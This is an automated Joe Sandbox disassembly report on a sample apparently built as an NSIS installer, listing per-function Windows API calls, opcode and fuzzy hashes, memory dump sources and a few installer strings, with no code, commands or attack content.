                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID:
                                                                                      • API String ID: 3449924974-0
                                                                                      • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                      • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                      • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                      • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                      APIs
                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0,00000000), ref: 00405D76
                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                      • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0,00000000), ref: 00405E1E
                                                                                      • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76F92EE0,00405B1A,?,00437800,76F92EE0), ref: 00405E2E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: 0_B
                                                                                      • API String ID: 3248276644-2128305573
                                                                                      • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                      • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                      • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                      • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                        • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                      • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                      • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                      • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,76F93420,004036EF), ref: 00405F46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: nsa
                                                                                      • API String ID: 1716503409-2209301699
                                                                                      • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                      • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                      • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                      • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                      APIs
                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 004059E4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                      • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                      • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                      • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                      • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                      • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                      • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                      • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                      • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                      • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                      • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                      • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                      • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                      • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                      • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                      • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                      • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                      • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                      • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                      • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                      • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                      • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                      • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                      • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                      • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                      • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2915273453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2915258849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915290093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915305201.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2915328833.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                      • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                      • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                      • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98